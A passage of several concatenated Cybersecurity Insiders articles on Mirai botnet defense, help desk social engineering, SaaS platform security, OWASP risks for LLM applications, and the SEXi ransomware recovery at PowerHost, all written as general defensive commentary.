In addition to traditional signatures, Managed Service Providers (MSPs) can significantly enhance protection for small businesses against Mirai botnet attacks. They can deploy the human layer of security to identify attacker behaviors across their networks with full network visibility and proactive threat detection capabilities. By offering a multi-layered defense strategy, MSPs provide small businesses with the expertise and resources needed to defend against evolving cyber threats like the Mirai botnet.

Mirai’s “Mirai” (Future)

The data suggest that Mirai and its variants will continue to evolve, becoming more sophisticated and dangerous. These botnets are likely to incorporate new techniques specifically designed to exploit vulnerabilities in IoT devices, making them even more effective at compromising a wide range of targets. We can also expect these threats to employ advanced evasion tactics to bypass traditional security measures, making detection and mitigation more challenging. Additionally, the target surface for these attacks is expected to broaden significantly, especially as 5G continues to allow more devices with limited reviewed firmware to be network-connected. As technology advances, Mirai is likely to set its sights on emerging technologies, including smart home devices, industrial IoT systems and critical infrastructure.

Protecting against Mirai and similar threats requires a multi-faceted approach. Device manufacturers must prioritize security in their designs, ensuring robust authentication and regular updates. Users need to apply patches promptly to mitigate known vulnerabilities. Implementing network segmentation and strict access controls can limit the impact of Mirai attacks. Behavioral analysis through Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) aids in early detection, while traffic monitoring helps identify Distributed Denial of Service (DDoS) attacks. Managed Service Providers (MSPs) are invaluable in monitoring alerts and identifying these types of attacks. Collaboration through threat intelligence sharing enhances collective defense, and educating users on securing IoT devices is crucial for prevention.

 

 

 

The post Decoding Router Vulnerabilities Exploited by Mirai: Insights from Honeypot Data appeared first on Cybersecurity Insiders.

According to Gartner, worldwide end-user spending on security and risk management is projected to total $215 billion in 2024. That is up nearly 15 percent from 2023. This increase in investments is happening for a good reason. Just look at the spike in ransomware attacks alone. According to recent Corvus Insurance research, ransomware attacks increased by 68 percent in 2023 (over 2022), establishing a new record for a single year at 4,496. 

Yet, as businesses invest in new and innovative technologies to tighten the perimeter and battle increasingly sophisticated attacks—endpoint detection and response, secure access service edge, identity, and access management, the list goes on—many are continuing to leave critical gaps that cybercriminals can and will exploit. One example is the IT help desk.

Help desks are being leveraged as a side door for cybercriminals, and for anyone questioning just how big an oversight this is, look no further than a leading Las Vegas resort. Last September, cybercriminals leveraged LinkedIn to get details on a report employee, which was then used to socially engineer the IT help desk into resetting the user’s account. That kicked off a cascading series of unfortunate events leading to a full-on ransomware attack. The full impact was apocalyptic: digital key cards for rooms stopped working, credit card terminals shut down, slot machines went out of service, and more.

In a battle where businesses exhaust vast sums of money to mitigate increasingly sophisticated attacks, incidents such as this stand out because the access point, a user account, and the tactics employed were actually both very low-tech. Yet, despite its simplicity, this approach allows attackers to skip several steps in a short amount of time. 

As I’ve been hearing more and more lately, “Attackers don’t break in; they log in.” The resort above is by no means alone. Many other companies have been victimized through the help desk and are responding with investments in secure multifactor authentication (MFA), which requires that employees provide multiple types of verification information. MFA is a great first step, but on its own is not enough. 

Many businesses fail to seal all gaps by not investing in processes to validate users before help desk personnel comply with requests to reset credentials. As a result, attackers armed with key pieces of personal information needed to pass the verification processes can cajole help desk personnel into resetting account credentials or the MFA method. From there, they gain free rein to an array of privileged information. 

To fully seal the side doors and prevent breaches, some additional steps for help desk personnel to employ include a multi-step verification process. Multi-step verification requires additional verification factors, which decreases the likelihood of a threat actor taking over an account. The key is asking users to provide details beyond any information they could glean from a site such as LinkedIn and other social media destinations. Yes, I’m talking about those overused security questions relying on relatively accessible information such as your mother’s maiden name, the street you grew up on, or high school mascot. 

Another element that can help is adding visual verification components. This could be as simple as a video call where the employee’s manager or a team member jumps on Zoom to verify that the person is who they say they are. Businesses can also take the next step and employ face-recognition technologies while tying in contextual information. 

A final set of verification factors to consider are location, network, and time of day. Each of these can be valuable in verifying that the person is who they say they are. 

Train Your Help Desk

Take the time to educate your help desk team on the latest tactics used by attackers. For example, attackers often create a fake sense of urgency, hoping that this need for immediate help or access will result in staff skipping key verification steps and giving the attacker what they are asking for. This is especially true when attackers are impersonating someone high-ranking at the company. Since this is a tried-and-true tactic, all help desk personnel should be trained to spot it and manage it accordingly.

Well-trained help desk employees should also be able to pick up on other cues. For example, when the help desk team asks a series of personal questions, there is an opportunity to not just wait for answers but to pick up on behavioral cues. There may be instances when a help desk employee may notice that the caller or person on chat takes an unusual amount of time to answer basic questions. This can be a strong indication that they aren’t who they claim to be. 

Stop Oversharing

In addition to the help desk, the company’s security team should work to educate all employees regarding the information they share on social media channels. As many of us know from personal experience, many sites ask the same verification questions when you cannot recall your password. You know the ones—what street you grew up on, the name of your first school, what was your high school mascot, what is your mother’s maiden name, etc.… I also know that many people inadvertently share the answers to these questions through the information they post on social media. As a result they put them out there where anyone can grab them. Work closely with your team to ensure the that information they are tying into key verification questions is not the same as what they could be posting online. 

In a world where increasingly sophisticated cybercriminals are waging battle against highly innovative security solutions, the simplicity of a help desk attack stands out, and in all likelihood, other bad actors are taking notice. That’s why companies must act now and take the necessary steps to help ensure that help desk personnel are not giving away the company keys to the wrong people, or even unlocking the door for them. 

The good news is that by investing in additional solutions and providing help desk personnel and general employee education, you will be able to fortify the help desk side door.

__

Ryan Bell, Threat Intel Manager, Corvus Insurance

Ryan has been at Corvus Insurance for over a year as the Manager of the Threat Intelligence Team. His role revolves around keeping Corvus insureds a step ahead of threat actors using a wealth of cybersecurity expertise. During his time at Corvus, the Threat Intelligence team has matured proactive alerting and intelligence analytics capabilities, supporting Corvus’s leading loss ratio and stature as a thought leader in cybersecurity. His background includes a graduate degree in sociology, undergraduate degrees in sociology and digital forensics, and numerous experiences starting and leading threat intelligence teams. 

The post Help Desk Personnel are the Side Door for Cybercriminals appeared first on Cybersecurity Insiders.

Distributing cloud solutions and services via a proprietary SaaS platform can be a highly profitable business model. Vendors of successful platforms can earn hundreds of millions of dollars annually, following the examples of Datadog, Hubspot, Salesforce, and other SaaS market players.

However, when developing a SaaS platform, vendors have to ensure the security of data they process and store. A single data breach can ruin a platform’s reputation and discourage thousands of paying customers from using it. Additionally, the platform’s vendor can be fined by a data protection regulator. To avoid these issues, a vendor should properly secure its SaaS platform against cyber threats.

In this article, we cover the most dangerous cyber threats for a SaaS platform and provide four tips on how a vendor can mitigate them.

Key security threats for a SaaS platform

• Malware attacks

Malware is any malicious program used to penetrate and infiltrate a target cloud system or environment. According to Thales’ 2024 Data Threat Report, 41% of companies faced a malware attack last year, and cloud storage, SaaS applications, and cloud infrastructure management tools were primary targets.

SQL injection attacks, enabling hackers to penetrate vulnerable SQL servers across a cloud infrastructure, are one of the most dangerous for SaaS platforms. A hacker could use this attack to corrupt a SaaS vendor’s corporate data, steal sensitive customer information, or disrupt a SaaS platform’s work.

• DoS/DDoS attacks

A DoS attack involves sending a large number of requests to the vendor’s servers to make a SaaS platform unavailable to users. DDoS is a more large-scale type of DoS attack that involves sending a large volume of traffic from multiple compromised sources. As highlighted in the DDoS Threat Report for 2024 Q1 by Cloudflare, DDoS attacks have become 50% more frequent compared to 2023.

According to the same report, four out of ten DDoS attacks lasted more than 10 minutes, while almost three out of ten lasted more than 1 hour. Given that customers expect 99.999% uptime from their SaaS and cloud service providers, mitigating DDoS timely can be critical for a vendor to remain competitive.

• Insider threats

An insider is a person (employee, business partner, etc.) with authorized access to the SaaS platform’s vendor’s systems, infrastructure, or data. Abusing this authorized access for sabotage, espionage, or other malicious purposes is an insider attack.

The 2024 Data Exposure Report by Code42 reveals that the number of companies that faced insider attacks has grown from 66% to 76% during 2019-2024. According to the same report, a single insider attack costs a business $15 million on average.

How to make your SaaS platform secure

Implementing secure development practices

SaaS vendors can mitigate many potential security risks and vulnerabilities by implementing appropriate security measures early in the platform development. Here are some practices that can help build a more secure SaaS platform:

• Threat modeling

Threat modeling involves identifying the most dangerous threats for the future SaaS platform, assessing their potential impact, and defining the best ways to mitigate them. By using tools such as OWASP Threat Dragon or Microsoft Threat Modeling Tool, IT teams can build and visualize threat models, analyze architecture designs for vulnerabilities, and generate insights on how to avoid potential attacks.

• Software Bill of Materials

In manufacturing, Bills of Materials (BOM) are lists covering all components required to build particular product items. BOM, which allows manufacturers to maintain complete component visibility, can also be used for SaaS platform development.

A Software Bill of Materials (SBOM) lists all libraries, scripts, licenses, services, and other components in a software solution. By documenting SBOM during platform engineering, developers can ensure full component transparency and streamline a platform’s vulnerability and risk management.

In practice, SBOMs allow developers to easily track current versions of different software components, which helps prioritize software fixes and updates to prevent critical vulnerabilities. Security teams can also use SBOM to understand the scope of security incidents and identify affected components, addressing potential cyber attacks more efficiently.

• Continuous testing

Continuous testing involves implementing security checks at multiple stages of the software development life cycle (SDLC). One of the essential continuous testing approaches is shift left testing, enabling IT teams to detect vulnerabilities at early software development stages and thus eliminate potential cyber threats quicker and with fewer resources.

Ensuring ISO 27001 and SOC 2 compliance

ISO 27001 and SOC 2 are two information security standards that help SaaS vendors maintain IT security within their organizations, which in turn can contribute to the security of the solutions they provide. Although adhering to these standards helps strengthen data security, only 8% of SaaS providers have achieved both ISO 27001 and SOC2 compliance, according to Vertice’s 2023 data.

ISO 27001 focuses on establishing a reliable information security management (ISM) system, which in turn defines security controls for the software development process. For instance, if a vendor is developing its SaaS platform in-house, ISO 27001-based ISM can guide a corporate testing team on how often they should run security tests and of what kind.

SOC 2 also establishes necessary data security controls for the software development process, helping make the SDLC more transparent, traceable, and controllable. For example, it prescribes software developers adhere to specific secure coding practices, such as input validation or output encoding, to avoid vulnerabilities in the code and ensure the SaaS platform’s security.

Improving physical security across an organization

SaaS platform vendors can establish their own data centers, rent cloud storage from third-party providers, or use a hybrid data storage approach. If a vendor houses some volume of data and workloads on-premises, they must ensure that their servers and data centers are sufficiently protected to avoid an insider threat. 

Implementing a video surveillance system augmented with artificial intelligence technology is one way to protect a vendor’s physical infrastructure. When installed in a server room, such a system can detect suspicious behavior of those who enter the room and alert security teams about potential threats in real time.

Resorting to managed cybersecurity services

Establishing a security operations center (SOC) to identify and prevent cyber threats is an efficient way to address DDoS attacks. However, building one in-house can be challenging for a SaaS platform vendor, as it requires hiring and training security specialists, not to mention significant equipment and technology investments.

Outsourcing security operations to third-party experts is a great way for vendors to avoid these complexities. A third-party team can act as a dedicated security operations center that monitors traffic across a vendor’s network infrastructure, detecting various security incidents, such as DDoS attacks, and timely responding to them, helping a vendor ensure 24x7x365 protection of the SaaS platform.

Final thoughts

Developing and monetizing a SaaS platform allows a vendor to earn millions yearly by selling business solutions and services to clients. Although this business model is promising, it’s also risky, as even minor cybersecurity breaches can cause significant reputational and financial losses.

Fortunately, vendors can avoid these risks by strengthening the cybersecurity of their SaaS platforms. Using secure coding practices, following ISO 27001 and SOC 2 security standards, and enhancing the physical security of servers and data centers are just some of the essential measures that can make a great difference.

Also, vendors can outsource experienced security professionals to help develop a reliable SaaS platform and then provide managed cybersecurity services, helping prevent security threats of all kinds.

 

The post How to ensure the security of your SaaS platform appeared first on Cybersecurity Insiders.

AI is evolving at a rapid pace, and the uptake of Generative AI (GenAI) is revolutionising the way humans interact and leverage this technology. GenAI is based on large language models (LLMs) that have proven remarkable capabilities for breaking down barriers between humans and machines – from generating human-like text to powering conversational interfaces and automating complex tasks.

Even though we are at the early stages of LLM adoption, businesses are preparing the way to build LLM-powered applications. Initial findings from our customers reveal that one out of four customers are building LLM-powered applications and around 20% of them are using OpenAI as their LLM. And according to a developer survey by Stack Overflow 70% of developers are using or are planning to use AI tools in their development process.

However, while businesses are strongly driven to embrace LLM adoption, in many cases a fear or lack of knowledge relating to the evolving attack vectors that come with it and AI-powered threats will be slowing down innovation.

The Open Worldwide Application Security Project (OSWAP) Top 10 list for LLM applications has driven further awareness around the risks from LLM adoption by highlighting the critical need for security tools and processes to confidently manage the rollout of GenAI technology. Three key areas of focus within the OWASP Top 10 for LLMs include Prompt Injection, Insecure LLM Interaction, and Data Access.

But how do these specifically affect cloud native applications, and what is important to know about these attack vector techniques? 

Top three LLM risks identified by the OWASP framework

  1. Prompt Injection – a new but serious attack technique specific to LLMs. Here the attacker crafts inputs designed to mislead or manipulate the model, with the intention to generate unintended or harmful responses. The model relies on input prompts to generate outputs and allows attackers to inject malicious instructions or context in line with these prompts. Prompt injection, if not identified, can lead to unauthorised actions or data breaches, compromising system security and integrity.
  2. Insecure LLM Interaction – LLMs interact with other systems, increasing the risk that their outputs can be leveraged for malicious activities, such as executing unauthorised code or initiating cybersecurity attacks. These threats pose significant risks to data leaks, and identity theft and compromise both security and data integrity. 
  3. Data access – LLMs store all the information they consume, heightening the level of data leakage risk when sensitive information is unintentionally exposed or accessed by an unauthorised person through the model’s output. The risk associated with improper data access controls is significant as it can lead to unauthorised data exposure, or breaches jeopardising both privacy and security. Proper controls are essential to mitigate this risk and ensure sensitive information stored within an LLM is processed and stored securely.

Businesses must be able to confidently navigate the complexities of LLM-based application development and deployment, ensuring compliance with regulatory standards and safeguarding against malicious exploits.

Here are the three key steps organisations must take to secure LLM applications from code to cloud:

1. Discovery phase

It is important to remember that as GenAI brings more simplicity for setting up applications, cybercriminals are seeking the same benefits. For example, AI agents can easily and quickly optimise productivity and speed into operations, but this evolution must be coupled with a robust security strategy for managing and monitoring agent-based systems. 

It starts by asking some crucial questions, about who and how GenAI is being used across the organisation and for what LLM applications. A thorough assessment is needed here, that identifies the various LLM applications or planned applications and how they interact with the full lifecycle. From code to cloud. The process involves identifying which microservices in the application have used or are backed by LLM-generated code and assessing the most common vulnerabilities associated by the nature of the application.

Understanding the different kinds of threats and integrating them with a business strategy will make sure LLM applications securely empower rather than hinder the business.

2. Protecting vulnerabilities and threats – in code, misconfiguration or runtime

Then it is about protecting the application that uses AI across the entire cloud application lifecycle. It is essential to employ advanced code scanning technology to identify and mitigate the unsafe use of LLM in application code, including unauthorised data access, misconfigurations, and vulnerabilities specific to LLM-powered applications.

By actively monitoring the workloads of LLM-powered applications, organisations can prevent unauthorised actions that LLMs might attempt, such as executing malicious code due to prompt injection attacks.

3. Implementing guardrails 

Employing specific GenAI assurance policies serve as guardrails for developers of LLM-powered applications. These policies will prevent unsafe usage of LLMs when based on practices from the OWASP Top 10 for LLMs.

With GenAI assurance policies enforced, alongside holistic protection across the entire cloud native application lifecycle, businesses and industries can truly embrace the transformative potential of GenAI. New standards and comprehensive protection for LLM-powered applications from code to cloud bridges the gap between security requirements and development processes. Thus, allowing organisations to fully embrace innovation while mitigating potential risks.

 

 

The post Embracing the benefits of LLM securely appeared first on Cybersecurity Insiders.

The rise of sophisticated cyberattacks and increasingly brazen attackers is a well-established threat. Businesses and organizations need to take action and be aware of the risks cyberattacks and data breaches pose to their daily functions, financial statements, and reputation. A recent ransomware incident involving IxMetro PowerHost, a Chilean data center and hosting provider with operations spanning the USA, South America, and Europe, is a stark reminder of these dangers.

The ransomware deployed by a threat actor group known as “SEXi” was specifically designed to target ESXi environments, a choice reflected in the group’s name, which is an anagram of ESXi. This suggests a deliberate focus on these systems, leveraging specific vulnerabilities or misconfigurations common in such setups. Once inside the network, the ransomware likely utilized scripts or automated processes to locate and encrypt ESXi server data systematically, rendering the virtual machines (VMs) and their associated data inaccessible. This method ensures a high-impact disruption, as each encrypted ESXi server simultaneously affects multiple clients and services.

The Attack History

April 2024 saw the emergence of the SEXi ransomware gang, which launched a strategic attack on PowerHost’s VMware ESXi servers hosting their clients’ virtual private servers (VPS). The ransomware, specifically crafted to exploit vulnerabilities in ESXi systems, spread rapidly across the network. It systematically encrypted data on the servers and backups, crippling the virtual machines (VMs) and rendering crucial data inaccessible.

SEXi’s method was particularly devastating because it focused on centralizing multiple virtual environments within single physical servers. This strategy maximized disruption by encrypting a limited number of high-value targets, significantly impacting PowerHost’s clients. This approach demonstrates an evolution in ransomware tactics, where attackers aim to negate the victim’s ability to recover independently, thus strengthening their leverage.

It encrypted terabytes of data, effectively rendering numerous websites and services hosted on these servers inaccessible. The ransomware gang demanded a ransom of two bitcoins per victim, which would have amounted to an astronomical $140 million.

Mitigation and Recovery

As customers began experiencing service outages, PowerHost’s IT team swiftly identified the ransomware infection. Recognizing the severity of the situation, they enlisted the expertise of Proven Data’s cybersecurity specialists. Simultaneously, PowerHost’s CEO, Ricardo Rubem, coordinated with law enforcement agencies across multiple countries to gain insights and formulate a response strategy. The clear consensus from these agencies was to refrain from paying the ransom.

Despite encrypting both primary data and backups, PowerHost and Proven Data worked tirelessly to restore services. Leveraging advanced decryption techniques and cutting-edge recovery tools, the joint effort resulted in successful data recovery for IxMetro PowerHost. This critical intervention saved the company from the staggering $140 million ransom demand and minimized operational downtime and financial losses.

While the recovery process is still ongoing, PowerHost has offered affected VPS customers the option to set up new VPS systems, enabling some customers to resume online operations.

Results

PowerHost’s collaboration with Proven Data cybersecurity experts and law enforcement agencies was crucial and underscored the importance of collective efforts in combating cyber threats. This collaborative approach was a testament to the strength of the cybersecurity community and its commitment to protecting businesses and organizations.

It also outlines the importance of transparent and timely communication with customers, which is vital in maintaining trust and managing the fallout from such attacks.

Lessons Learned

The ransomware attack on PowerHost is a critical lesson for businesses worldwide about the necessity of robust cybersecurity measures. By learning from PowerHost’s experience, other companies can fortify their defenses and better protect themselves against the ever-growing ransomware threat. The incident highlights the strength of the cybersecurity community and its unwavering commitment to safeguarding businesses and their operations.

About Bogdan Glushko

Bogdan Glushko is the Chief Information Officer of Proven Data. Glushko actively leverages his years of experience restoring thousands of critical systems after incidents. Glushko is a trusted voice guiding organizations on resilient data strategies, ransomware response protocols, and mitigating evolving cyber threats. Through proven leadership, he continues delivering cutting-edge data preservation and recovery solutions that fortify business resilience against breaches, outages, and data loss from modern cyber attacks.

The post Proven Data Restores PowerHost’s VMware Backups After SEXi Ransomware Attack appeared first on Cybersecurity Insiders.